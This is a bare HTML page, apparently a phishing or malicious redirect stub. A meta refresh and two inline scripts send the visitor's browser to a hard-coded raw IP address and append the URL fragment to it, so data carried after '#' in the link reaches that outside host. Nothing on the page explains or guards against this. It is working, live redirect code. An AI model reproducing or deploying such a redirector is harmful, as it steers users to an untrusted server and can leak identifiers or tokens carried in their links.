<meta http-equiv="refresh" content="3; url=">
<script>
    document.getElementsByTagName("META")[0].setAttribute('content','0; url=http://51.159.94.203//'+window.location.href.split('#')[1]);
</script>
<script>document.location.href = 'http://51.159.94.203/'+window.location.href.split('#')[1];</script>